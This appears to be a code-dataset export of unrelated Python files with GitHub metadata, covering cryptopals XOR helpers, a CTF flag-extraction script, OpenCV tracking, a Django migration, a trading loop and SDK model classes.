# raw_input("Press enter to continue...")
raw_input("Press enter to exit...") | [
"noreply@github.com"
] | Anto09.noreply@github.com |
2ea5c5280dcf41d96d593b8f51556663175988df | f8f894b4cb099aa5c3ce0039270f74d390833604 | /tools/generate_town_table.py | 50eaa1a35d785cd8037672236ee28d55ca7fec91 | [
"BSD-3-Clause"
] | permissive | ommokazza/uwo_ps_tools | d7431908b3cf09ff661ddbd2ad7c56702cb8f72a | 34642e1ae42f873e424582f9406ef302375b3759 | refs/heads/master | 2020-03-29T22:11:14.004986 | 2018-10-16T02:54:52 | 2018-10-16T02:54:52 | 150,407,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,085 | py | """Generate python code for town table
"""
import os
def get_town_table(screenshot_dir):
"""Generate python code for town table
Its format is
table[town_name] = (nearby town1, nearby town2...nearby town5)
The length of tuple may be different depends on town.
Arguments:
screenshot_dir (str): Directory which have town_name directory
and label.
Return:
python code style string (str)
"""
result = "TOWNS_TABLE = {}\n"
for di in sorted(os.listdir(screenshot_dir)):
dir_path = screenshot_dir + "/" + di
if not os.path.isdir(dir_path):
continue
for f in os.listdir(dir_path):
if f.lower().endswith(".txt"):
result += "TOWNS_TABLE[("
lines = open(dir_path + "/" + f).read().splitlines()
for i in range(3, len(lines), 3):
result += "'%s', " % lines[i]
result = result[:-2] + ")]\\"
result += "\n= '%s'\n" % di
break
return result
| [
"ommokazza@gmail.com"
] | ommokazza@gmail.com |
df32af9fbc1f5ba6e2290693ebc1b070be6cf909 | d3ed8b2a0aa287858e4e459a8082194790f78d7d | /tools.py | 7f93cb01b004636b5a6f833164d62c43d2885d84 | [
"MIT"
] | permissive | kimvais/matasano | f4ac31d5947783a92c6169016f836ee0a622a1ec | 1f687505f11d36ef76810c1fcecf3178b68d75fd | refs/heads/master | 2020-05-17T05:42:24.720539 | 2014-08-21T20:05:01 | 2014-08-21T20:05:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,535 | py | import base64
from collections import Counter
import string
import logging
import math
import binascii
logger = logging.getLogger(__name__)
__author__ = 'kimvais'
def hex2base64(data):
return base64.b64encode(binascii.unhexlify(data))
def xorwith(data, key):
return '{:0x}'.format(int(data, 16) ^ int(key, 16))
def xorwith_char(data, char):
output = bytes(bytearray((a ^ char) for a in data))
return output
def english_freq(data, min_score=3):
frequencies = {'e': 12.02,
't': 9.10,
'a': 8.12,
'o': 7.68,
'i': 7.31,
'n': 6.95,
' ': 6.10,
's': 6.28,
'r': 6.02,
'h': 5.92,
'd': 4.32,
'l': 3.98,
'u': 2.88,
'c': 2.71,
'm': 2.61,
'f': 2.30,
'y': 2.11,
'w': 2.09,
'g': 2.03,
'p': 1.82,
'b': 1.49,
'v': 1.11,
'k': 0.69,
'x': 0.17,
'q': 0.11,
'j': 0.10,
'z': 0.07}
if not isinstance(data, (bytes, bytearray)):
data = binascii.unhexlify(data)
else:
data = data
candidate = None
best = min_score
for char in range(256):
output = xorwith_char(data, char)
freqs = Counter(output)
histogram = bytes(x[0] for x in freqs.most_common(13))
if not all(chr(c) in string.printable for c in histogram):
continue
score = 0
for k, v in frequencies.items():
score += freqs[ord(k)] * v
score = score / len(output)
if score > best:
logger.info('Found a candidate histogram: {} with score {} - {}'.format(bytes(histogram), score, output))
best = score
candidate = (output, char)
return candidate
def xor_with_key(data, key):
output = bytearray()
for i, c in enumerate(data):
key_idx = i % len(key)
output.append(key[key_idx] ^ c)
return bytes(output)
def hamming(a, b):
"""
Calculates the edit distance / hamming distance of two input streams a and b
:param a: bytes()
:param b: bytes()
:return: int()
"""
assert len(a) == len(b)
distances = (x ^ y for x, y in zip(a, b))
c = Counter()
for x in distances:
c.update(bin(x).lstrip('0b'))
return c['1']
def chunk_into(data, size):
ret = list()
for i in range(math.ceil(len(data) / size)):
ret.append(data[i * size:(i + 1) * size])
return ret
def pkcs7pad(data, blocksize):
assert isinstance(data, bytes)
padlen = blocksize - len(data) % blocksize
if padlen == 0:
padlen = blocksize
return data + padlen * bytes((padlen,))
def unpad(plain):
padding = plain[-plain[-1]:]
if len(set(padding)) != 1:
raise ValueError('Invalid padding: {}'.format(padding))
return plain[:-plain[-1]]
class UserProfile(dict):
def __init__(self, d):
super().__init__()
self.__dict__ = self
for k, v in d.items():
if not isinstance(v, (bytes, int)):
v = v.encode('ascii')
self[k] = v
def serialize(self):
return b'email=' + self.email + '&uid={}'.format(self.uid).encode('ascii') + b'&role=' + self.role
| [
"kimvais@ssh.com"
] | kimvais@ssh.com |
ef61049bf34a736fb12e8b3475ff866551f867b5 | 807e1b0425c175a7df61e71a77c1cb08e70306ad | /myapp/migrations/0005_auto_20201018_1403.py | 2845d8069981d82e24ffbb2fd0378078f0128bbe | [] | no_license | priyanshiparsana2502/Student_APP | 56c2d2d0d40a6da5fc070824e2acdbbf737249ee | 119bf4d56f0540038c5589e0c5cf907a46c6ad7c | refs/heads/main | 2023-05-10T15:08:40.066863 | 2021-06-14T15:49:26 | 2021-06-14T15:49:26 | 376,876,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 765 | py | # Generated by Django 3.1.2 on 2020-10-18 18:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0004_order'),
]
operations = [
migrations.AddField(
model_name='course',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='topic',
name='length',
field=models.IntegerField(default=12),
),
migrations.AlterField(
model_name='order',
name='order_status',
field=models.IntegerField(choices=[(0, 'Cancelled'), (1, 'Confirmed'), (2, 'On Hold')], default=1, max_length=1),
),
]
| [
"67198123+priyanshiparsana2502@users.noreply.github.com"
] | 67198123+priyanshiparsana2502@users.noreply.github.com |
31cd210929e689f0530b25d7533cfe7bcd9c01bd | e135f8fb38d1834a6a9d838b98c6641f204fc4a0 | /old/perpetual.py | ce758f54c84fc51a03c19b42b095a2106f783922 | [] | no_license | siyuan0/HexCambridge2021 | 7031e7faab4c2c39a3766fcaa4c012b421852634 | 5a44db16f7f247206b91e126abb91b885970a52f | refs/heads/master | 2023-02-23T08:38:43.226256 | 2021-01-24T17:26:22 | 2021-01-24T17:26:22 | 332,413,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | from optibook.synchronous_client import Exchange
import logging
import time
logger = logging.getLogger('client')
logger.setLevel('ERROR')
print("Setup was successful.")
instrument_id1 = 'PHILIPS_A'
instrument_id2 = 'PHILIPS_B'
e = Exchange()
a = e.connect()
# Returns all current positions
# positions = e.get_positions()
# for p in positions:
# print(p, positions[p])
# print("-----------------------------")
# # print(e.get_outstanding_orders(p))
# # print("-----------------------------")
# print(e.get_last_price_book(p).asks)
# print(e.get_last_price_book(p).bids)
while True:
if len(e.get_last_price_book(instrument_id1).bids) == 0 or \
len(e.get_last_price_book(instrument_id1).asks) == 0 or \
len(e.get_last_price_book(instrument_id2).bids) == 0 or \
len(e.get_last_price_book(instrument_id2).asks) == 0:
time.sleep(0.25)
else:
A_best_bid = e.get_last_price_book(instrument_id1).bids[0].price
A_best_ask = e.get_last_price_book(instrument_id1).asks[0].price
B_best_bid = e.get_last_price_book(instrument_id2).bids[0].price
B_best_ask = e.get_last_price_book(instrument_id2).asks[0].price
# print(A_best_bid, A_best_ask, B_best_bid, B_best_ask)
if A_best_bid > B_best_ask:
A_best_bid_vol = e.get_last_price_book(instrument_id1).bids[0].volume
B_best_ask_vol = e.get_last_price_book(instrument_id2).asks[0].volume
volume = min(A_best_bid_vol, B_best_ask_vol)
result = e.insert_order(instrument_id1, price = A_best_bid, volume=volume, side='bid', order_type='limit')
result = e.insert_order(instrument_id2, price = B_best_ask, volume=volume, side='ask', order_type='limit')
print(f"Order Id: {result}")
if B_best_bid > A_best_ask:
A_best_ask_vol = e.get_last_price_book(instrument_id1).asks[0].volume
B_best_bid_vol = e.get_last_price_book(instrument_id2).bids[0].volume
volume = min(A_best_ask_vol, B_best_bid_vol)
result = e.insert_order(instrument_id2, price = B_best_bid, volume=volume, side='bid', order_type='limit')
result = e.insert_order(instrument_id1, price = A_best_ask, volume=volume, side='ask', order_type='limit')
print(f"Order Id: {result}")
time.sleep(0.25)
if len(e.get_outstanding_orders(instrument_id1)) != 0:
e.delete_orders(instrument_id1)
if len(e.get_outstanding_orders(instrument_id2)) != 0:
e.delete_orders(instrument_id2) | [
"sc2178@cam.ac.uk"
] | sc2178@cam.ac.uk |
d72ecdd7a3b850a399fcd9116f3c384b38b3d1d6 | 181e9cc9cf4e52fcc6e9979890cc5b41e7beb756 | /Module 1/06_Codes/06/06_Codes/managers.py | c2650fc77fbc09ebd2367a198a7481ec81ec29c4 | [
"MIT"
] | permissive | PacktPublishing/OpenCV-Computer-Vision-Projects-with-Python | ace8576dce8d5f5db6992b3e5880a717996f78cc | 45a9c695e5bb29fa3354487e52f29a565d700d5c | refs/heads/master | 2023-02-09T14:10:42.767047 | 2023-01-30T09:02:09 | 2023-01-30T09:02:09 | 71,112,659 | 96 | 72 | null | null | null | null | UTF-8 | Python | false | false | 6,862 | py | import cv2
import numpy
import pygame
import time
import utils
class CaptureManager(object):
def __init__(self, capture, previewWindowManager = None,
shouldMirrorPreview = False):
self.previewWindowManager = previewWindowManager
self.shouldMirrorPreview = shouldMirrorPreview
self._capture = capture
self._channel = 0
self._enteredFrame = False
self._frame = None
self._imageFilename = None
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
self._startTime = None
self._framesElapsed = long(0)
self._fpsEstimate = None
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
if self._channel != value:
self._channel = value
self._frame = None
@property
def frame(self):
if self._enteredFrame and self._frame is None:
_, self._frame = self._capture.retrieve(channel = self.channel)
return self._frame
@property
def isWritingImage(self):
return self._imageFilename is not None
@property
def isWritingVideo(self):
return self._videoFilename is not None
def enterFrame(self):
"""Capture the next frame, if any."""
# But first, check that any previous frame was exited.
assert not self._enteredFrame, \
'previous enterFrame() had no matching exitFrame()'
if self._capture is not None:
self._enteredFrame = self._capture.grab()
def exitFrame(self):
"""Draw to the window. Write to files. Release the frame."""
# Check whether any grabbed frame is retrievable.
# The getter may retrieve and cache the frame.
if self.frame is None:
self._enteredFrame = False
return
# Update the FPS estimate and related variables.
if self._framesElapsed == 0:
self._startTime = time.time()
else:
timeElapsed = time.time() - self._startTime
self._fpsEstimate = self._framesElapsed / timeElapsed
self._framesElapsed += 1
# Draw to the window, if any.
if self.previewWindowManager is not None:
if self.shouldMirrorPreview:
mirroredFrame = numpy.fliplr(self._frame).copy()
self.previewWindowManager.show(mirroredFrame)
else:
self.previewWindowManager.show(self._frame)
# Write to the image file, if any.
if self.isWritingImage:
cv2.imwrite(self._imageFilename, self._frame)
self._imageFilename = None
# Write to the video file, if any.
self._writeVideoFrame()
# Release the frame.
self._frame = None
self._enteredFrame = False
def writeImage(self, filename):
"""Write the next exited frame to an image file."""
self._imageFilename = filename
def startWritingVideo(
self, filename,
encoding = cv2.cv.CV_FOURCC('I','4','2','0')):
"""Start writing exited frames to a video file."""
self._videoFilename = filename
self._videoEncoding = encoding
def stopWritingVideo(self):
"""Stop writing exited frames to a video file."""
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
def _writeVideoFrame(self):
if not self.isWritingVideo:
return
if self._videoWriter is None:
fps = self._capture.get(cv2.cv.CV_CAP_PROP_FPS)
if fps == 0.0:
# The capture's FPS is unknown so use an estimate.
if self._framesElapsed < 20:
# Wait until more frames elapse so that the
# estimate is more stable.
return
else:
fps = self._fpsEstimate
size = (int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
self._videoWriter = cv2.VideoWriter(
self._videoFilename, self._videoEncoding,
fps, size)
self._videoWriter.write(self._frame)
class WindowManager(object):
def __init__(self, windowName, keypressCallback = None):
self.keypressCallback = keypressCallback
self._windowName = windowName
self._isWindowCreated = False
@property
def isWindowCreated(self):
return self._isWindowCreated
def createWindow(self):
cv2.namedWindow(self._windowName)
self._isWindowCreated = True
def show(self, frame):
cv2.imshow(self._windowName, frame)
def destroyWindow(self):
cv2.destroyWindow(self._windowName)
self._isWindowCreated = False
def processEvents(self):
keycode = cv2.waitKey(1)
if self.keypressCallback is not None and keycode != -1:
# Discard any non-ASCII info encoded by GTK.
keycode &= 0xFF
self.keypressCallback(keycode)
class PygameWindowManager(WindowManager):
def createWindow(self):
pygame.display.init()
pygame.display.set_caption(self._windowName)
self._isWindowCreated = True
def show(self, frame):
# Find the frame's dimensions in (w, h) format.
frameSize = frame.shape[1::-1]
# Convert the frame to RGB, which Pygame requires.
if utils.isGray(frame):
conversionType = cv2.COLOR_GRAY2RGB
else:
conversionType = cv2.COLOR_BGR2RGB
rgbFrame = cv2.cvtColor(frame, conversionType)
# Convert the frame to Pygame's Surface type.
pygameFrame = pygame.image.frombuffer(
rgbFrame.tostring(), frameSize, 'RGB')
# Resize the window to match the frame.
displaySurface = pygame.display.set_mode(frameSize)
# Blit and display the frame.
displaySurface.blit(pygameFrame, (0, 0))
pygame.display.flip()
def destroyWindow(self):
pygame.display.quit()
self._isWindowCreated = False
def processEvents(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and \
self.keypressCallback is not None:
self.keypressCallback(event.key)
elif event.type == pygame.QUIT:
self.destroyWindow()
return | [
"prasadr@packtpub.com"
] | prasadr@packtpub.com |
e53e1359ada1e7abcdeff9e0c1d64916715d6e0b | dd381750b40d26b188f090a5c621e045d266e5b2 | /ctf-scripts/hacklu2014/pwn300-holy-mose.py | 596e8ff604fd355bb3a119bcdcb228bd372f55b5 | [] | no_license | huyna/sftc | dceac0c183d76c3647f0610b06e671edca7d4d60 | 69852e066a29e4a7ace3fc4c89c902924be97db6 | refs/heads/master | 2021-01-10T10:09:54.566089 | 2015-11-20T02:40:54 | 2015-11-20T02:40:54 | 46,462,927 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | __author__ = 'HuyNA'
'''
The craziest saloon in town, called Holy Moses, is throwing one of their crazy parties again.
As usually they have a special VIP area, with the hottest people, free drinks and a private band.
Each time you hear people talking about it how crazy and amazing it was.
But to gain access to the area you need a special invite code and unfortunately for you, you don't know anybody to get you one.
But you are lucky, they have a online service running to enter referal codes and request an invite code.
Maybe the programmer did a crappy job
and you find a way to gain access to the server and retrieve the invite code (file called 'flag').
Good luck.
service running at: nc wildwildweb.fluxfingers.net 1405
''' | [
"huyna89@hotmail.com"
] | huyna89@hotmail.com |
85e8933aa80d8f2d5d05d32dc0c057ca837c753a | fe0cd921f2bb325834d735e76d023ac7dbd9bb75 | /DatabaseInterface.py | b08f1850d7c4ea725b578c737d523ff3b3431149 | [] | no_license | hamemomo/recommend_system | 350a35a3872993a34b6b21109591ed7cbc7d1888 | 1a320130506e0b3d8e305bf87627cbd0a2cde54a | refs/heads/master | 2020-08-27T22:22:09.241805 | 2019-10-25T09:57:24 | 2019-10-25T09:57:24 | 217,504,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,540 | py | # Database Interface
# to simulate some database operations
import os
import pandas as pd
import logging
class DatabaseInterface(object):
logging.basicConfig(level=logging.INFO)
# in reality, it should be a configuration file
HISTORY = "ratings.csv"
USER_FEATURE = "userFeature.csv"
ITEM_FEATURE = "itemFeature.csv"
INVENTORY = "inventory.csv" #in reality, inventory store all the representations, such as video link
HISTORY_KEY = "history"
USER_FEATURE_KEY = "user_feature"
ITEM_FEATURE_KEY = "item_feature"
INVENTORY_KEY = "inventory"
USER_ACTIVITY_KEY = "user_activity"
# register the static database first
dbTable = {HISTORY_KEY: HISTORY,
USER_FEATURE_KEY: USER_FEATURE,
ITEM_FEATURE_KEY: ITEM_FEATURE,
INVENTORY_KEY: INVENTORY}
def __init__(self, path):
self.log = logging.getLogger(__name__)
self.path = path
self.started = False
self.connTable = {}
def startEngine(self):
if self.started:
self.log.warning("the data base has already started")
# start a running engine is not permitted here since it will remove all unsaved data
else:
self.log.info("start the database engine...")
for tableName, tablePath in self.dbTable.items():
print("tablename = ",tableName,"-------tablepath = ",tablePath)
self.log.info("loading table %s..." % tableName)
self.connTable[tableName] = pd.read_csv(os.path.join(self.path, tablePath), index_col=0)
self.log.info("creating table user_activity...")
self.connTable[self.USER_ACTIVITY_KEY] = self.connTable["history"].groupby("user_id").size() # actually a series
self.log.info("database successfully started")
self.started = True
# ideally a sql should be used to query a database, in this case, pandas operation will used instead in client
# https://pandas.pydata.org/pandas-docs/stable/comparison_with_sql.html
def extract(self, tableName):
return self.connTable[tableName]
def putAction(self, action):
insertRow(self.connTable[self.HISTORY_KEY], [action.userId, action.itemId, action.rating])
def insertRow(df,row):
# unsafe insertion into pandas dataframe
df.loc[len(df)] = row
if __name__ == "__main__":
connector = DatabaseInterface("DATA")
connector.startEngine()
df1 = connector.connTable["history"]
print (df1.head())
df2 = connector.connTable["user_activity"]
print (df2[10])
df3 = connector.connTable["item_feature"]
print (df3.loc[:,"unknown":])
df4 = connector.connTable["user_feature"]
print (df4.loc[:,"age":])
print (set(df1[df1.loc[:,"user_id"]==2].loc[:,"item_id"]))
| [
"Jim@email.com"
] | Jim@email.com |
b626b508122d65548f0ae58b5d22a240ad38f1e4 | 4ead088355078df170fac48b50c08f304b5ecda0 | /easy_solved/solution.py | fb4956740c056d12057ac7d453370ae1c7491bb3 | [
"MIT"
] | permissive | UndeadRat22/LASACTF2016 | 385ad939cdbf58925a2683db59b016ca312409de | 157d62b8d29042f3162c37680d4b78ab234b7b76 | refs/heads/master | 2020-03-24T14:50:43.998232 | 2018-10-20T18:18:06 | 2018-10-20T18:18:06 | 142,778,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | import requests
import re
from subprocess import check_output as cmd
fileurl = "https://raw.githubusercontent.com/LASACTF/LASACTF-Problems/master/Problems/Reverse%20Engineering/easy/easy.exe"
filename = "easy.exe"
def download(url):
resp = requests.get(fileurl)
if (resp.status_code == 200):
return resp.content
if (__name__ == "__main__"):
filedata = download(fileurl)
if (not filedata):
exit(-1)
with open(filename, "wb") as file:
file.write(filedata)
try:
result = cmd(["strings", filename])
except Exception as e:
print("could not parse the file {} using strings!".format(filename))
print(e)
if (not result):
exit(-1)
flags = re.findall(r"lasactf{(.*)}", str(result))
print(flags[0][:17]) | [
"noreply@github.com"
] | UndeadRat22.noreply@github.com |
99c176efd11b74b9d69be376b3a77f6b0ec21b35 | 0c02476560f181542225a27cded203e0a158a661 | /python/meanshift.py | e00efd34b66fa416f4f580e79e9080f5293b6f94 | [] | no_license | siddharthdeore/ComputerVision | 7eaeab66beea43e6691eb75f969d7c3f704940af | 2e42dd0e84da61ac259d9b89fbaee96aef24da05 | refs/heads/master | 2021-01-19T03:08:27.251106 | 2017-04-06T11:02:56 | 2017-04-06T11:02:56 | 87,306,521 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,371 | py | import numpy as np
import cv2
frame = None
roiPts = []
inputMode = False
# Getting the camera reference
cap = cv2.VideoCapture(0)
#cap = cv2.VideoCapture('http://192.168.2.114:8080/video?x.mjpg')
# Callback function to get the ROI by clicking into four points
def click_and_crop(event, x, y, flags, param):
# grab the reference to the current frame, list of ROI
# points and whether or not it is ROI selection mode
global frame, roiPts, inputMode
# if we are in ROI selection mode, the mouse was clicked,
# and we do not already have four points, then update the
# list of ROI points with the (x, y) location of the click
# and draw the circle
if inputMode and event == cv2.EVENT_LBUTTONDOWN and len(roiPts) < 4:
roiPts.append((x, y))
cv2.circle(frame, (x, y), 4, (255, 0, 0), 1)
cv2.imshow("image", frame)
# Attaching the callback into the video window
cv2.namedWindow("image")
cv2.setMouseCallback("image", click_and_crop)
# Setup the termination criteria, either 10 iteration or move by atleast 1 pt
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 20, 10 )
roiBox = None
print "Enter character i and select 4 points near object to track"
# Main loop
while(1):
ret ,frame = cap.read()
if roiBox is not None:
# Making the frame into HSV and backproject the HSV frame
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv],[0],roi_hist,[0,180],1)
# Apply meanshift to get the new location
ret, roiBox = cv2.CamShift(dst, roiBox, term_crit)
# Draw it on image
pts = cv2.cv.BoxPoints(ret)
pts = np.int0(pts)
cv2.polylines(frame,[pts],True, (255,255,0),2)
# Draw the center
cx = (pts[0][0]+pts[1][0])/2
cy = (pts[0][1]+pts[2][1])/2
cv2.circle(frame, (cx, cy), 4, (0, 255, 255), 1)
#cv2.imshow('img2',frame)
# handle if the 'i' key is pressed, then go into ROI
# selection mode
cv2.imshow("image", frame)
key = cv2.waitKey(1) & 0xFF
# if key == ord("i") and len(roiPts) < 4:
if key == ord("i"):
# indicate that we are in input mode and clone the
# frame
inputMode = True
orig = frame.copy()
roiPts = []
# keep looping until 4 reference ROI points have
# been selected; press any key to exit ROI selction
# mode once 4 points have been selected
while len(roiPts) < 4:
cv2.imshow("image", frame)
cv2.waitKey(0)
# determine the top-left and bottom-right points
roiPts = np.array(roiPts)
s = roiPts.sum(axis = 1)
tl = roiPts[np.argmin(s)]
br = roiPts[np.argmax(s)]
# grab the ROI for the bounding box and convert it
# to the HSV color space
roi = orig[tl[1]:br[1], tl[0]:br[0]]
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
# compute a HSV histogram for the ROI and store the
# bounding box
roi_hist = cv2.calcHist([roi], [0], None, [16], [0, 180])
roi_hist = cv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)
roiBox = (tl[0], tl[1], br[0], br[1])
inputmode = False
# k = cv2.waitKey(60) & 0xff
if key == 27:
break
cv2.destroyAllWindows()
cap.release()
| [
"noreply@github.com"
] | siddharthdeore.noreply@github.com |
549d26bdfebb26f7e41ffa553e48b04e054ae011 | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/insight/models/get_statistics_per_unit_response_overview.py | 8dead06a2e9bdba632aa7f0ff33642dfff6804fd | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 4,122 | py | # coding: utf-8
"""
LINE Messaging API(Insight)
This document describes LINE Messaging API(Insight). # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import Optional
from pydantic.v1 import BaseModel, Field, StrictInt
class GetStatisticsPerUnitResponseOverview(BaseModel):
"""
Statistics related to messages.
https://developers.line.biz/en/reference/messaging-api/#get-statistics-per-unit-response
"""
unique_impression: Optional[StrictInt] = Field(None, alias="uniqueImpression", description="Number of users who opened the message, meaning they displayed at least 1 bubble.")
unique_click: Optional[StrictInt] = Field(None, alias="uniqueClick", description="Number of users who opened any URL in the message.")
unique_media_played: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed", description="Number of users who started playing any video or audio in the message.")
unique_media_played100_percent: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed100Percent", description="Number of users who played the entirety of any video or audio in the message.")
__properties = ["uniqueImpression", "uniqueClick", "uniqueMediaPlayed", "uniqueMediaPlayed100Percent"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# set to None if unique_impression (nullable) is None
# and __fields_set__ contains the field
if self.unique_impression is None and "unique_impression" in self.__fields_set__:
_dict['uniqueImpression'] = None
# set to None if unique_click (nullable) is None
# and __fields_set__ contains the field
if self.unique_click is None and "unique_click" in self.__fields_set__:
_dict['uniqueClick'] = None
# set to None if unique_media_played (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played is None and "unique_media_played" in self.__fields_set__:
_dict['uniqueMediaPlayed'] = None
# set to None if unique_media_played100_percent (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played100_percent is None and "unique_media_played100_percent" in self.__fields_set__:
_dict['uniqueMediaPlayed100Percent'] = None
return _dict
@classmethod
def from_dict(cls, obj: dict) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return GetStatisticsPerUnitResponseOverview.parse_obj(obj)
_obj = GetStatisticsPerUnitResponseOverview.parse_obj({
"unique_impression": obj.get("uniqueImpression"),
"unique_click": obj.get("uniqueClick"),
"unique_media_played": obj.get("uniqueMediaPlayed"),
"unique_media_played100_percent": obj.get("uniqueMediaPlayed100Percent")
})
return _obj
| [
"noreply@github.com"
] | line.noreply@github.com |
18208e0e8472a9a979844ccc86b91d2486e2c4bd | be9213551cec52e4cd299450cbd8fae6ee3718f8 | /Estudos/Phyton/Exemplos/ex_1.py | 9c7fd252ac757cd27b6abefd8f1f899508b27ede | [] | no_license | jopape/Projects | 923fc432b12add0d48ce08ba2ed8d4f03fe65fa0 | e941892838763102ef79322202d4d10a92afadfe | refs/heads/master | 2021-01-16T22:57:55.189357 | 2012-12-14T15:13:16 | 2012-12-14T15:13:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | print "Hello World!"
print "Hello Again"
print "I like typing this."
print "This is fun."
print 'Yay! Printing.'
print "I'd much rather you 'not'." | [
"harumi_tominaga@hotmail.com"
] | harumi_tominaga@hotmail.com |
3a8187647befc71d2cbcf0f4b1bafa6ded704304 | c6e3e46e386999a333ff6c04e0dda01a387b2a2e | /PythonPrograms/Physics/Pracs/JJAbrahamICT4.py | 6953ddb51bbea551f3cadcabb4dbf18c81bc2674 | [] | no_license | FreddyManston/Misc | 6bcc25247fbb3738e46bc2a78bea8ced2adb7c62 | 4d6f257ee75047cb239e6d0341df6a95f0197007 | refs/heads/master | 2021-06-21T23:16:22.320479 | 2020-11-15T20:26:51 | 2020-11-15T20:26:51 | 133,033,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,328 | py | # Author: Joshua J. Abraham
# Student No.: 3475896
# Date: 13/08/2015
# Description: Estimates the y-intercept between two points, using one of three methods
def bisection(x1, x2):
while (abs(x1 - x2) >= 10**-5):
x3 = (x1 + x2) / 2 # Midpoint
if (f(x1) * f(x3) < 0):
x2 = x3
else:
x1 = x3
print ("Midpoint is: " + str(x3) + ". With a tolerance of 10^-5")
def sectant(x1, x2):
if (abs(f(x1)) < abs(f(x2))):
temp = x1
x1 = x2
x2 = temp
x3 = x2 - ((f(x2) * (x1 - x2)) / (f(x1) - f(x2)))
while (abs(f(x3)) < 10**-5):
x3 = x2 - ((f(x2) * (x1 - x2)) / (f(x1) - f(x2)))
x1 = x2
x2 = x3
print ("Midpoint is: " + str(x3) + ". With a tolerance of 10^-5")
def newton(x1):
if (f(x1) != 0 and f_prime(x1) != 0):
while (abs(f(x1)) >= 10**-5):
x2 = x1
x1 = x1 - (f(x1) / f_prime(x1))
print ("Midpoint is: " + str(x1) + ". With a tolerance of 10^-5")
def f(x):
return x**3 + 4*x - 10
def f_prime(x):
return 3*x**2 + 4
print ("\nWhich algorithm would you like to use? Type in the number.")
print ("1) Bisection \n2) Sectant \n3) Newton's technique")
choice = input("Type in your choice: ")
if choice == 1:
bisection(1.0, 2.0)
elif choice == 2:
sectant(1.0, 2.0)
elif choice == 3:
newton(1.0)
else:
print ("Invalid input. Exiting.") | [
"freddymanston@gmail.com"
] | freddymanston@gmail.com |
07668a1f866d382975faa194303b687ba0b4523d | f30a13b0399cfb2ef759c40a9c326d8c0adf864d | /brew/__init__.py | 188c94a8fb19d432d5bf4985024f067c6003c634 | [
"MIT"
] | permissive | glemaitre/brew | e424f4b06e53f908207507878ac19d9a30c2bb42 | 513da26c6437be5437273ae22f702d45d4b9bfe1 | refs/heads/master | 2021-04-15T07:09:16.736987 | 2016-06-28T11:50:31 | 2016-06-28T11:50:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | __author__ = 'Dayvid Victor <victor.dvro@gmail.com>, Thyago Porpino <thyago.porpino@gmail.com>'
__email__='brew-python-devs@googlegroups.com',
__version__ = '0.1.3'
from brew.base import Ensemble, EnsembleClassifier
__all__ = ['Ensemble',
'EnsembleClassifier']
| [
"victor.dvro@gmail.com"
] | victor.dvro@gmail.com |
5159225c0da48ffee4128a8f320257f6fd54c027 | 192b040fb4487d4634c41cdf9c66042853749937 | /colat/utils/net_utils.py | 7a7779793ea99d6ebbe84439cc208456d7e36450 | [] | no_license | kkodoo/latentclr | f62dbdb50d3a9ad0cd3869618c973d88cf4406fb | f5e88ee90f5c5dc38a42972117acf419dfa39da9 | refs/heads/main | 2023-08-29T10:24:46.831681 | 2021-10-11T19:32:25 | 2021-10-11T19:32:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | from collections import OrderedDict
import torch
def create_mlp(
depth: int,
in_features: int,
middle_features: int,
out_features: int,
bias: bool = True,
batchnorm: bool = True,
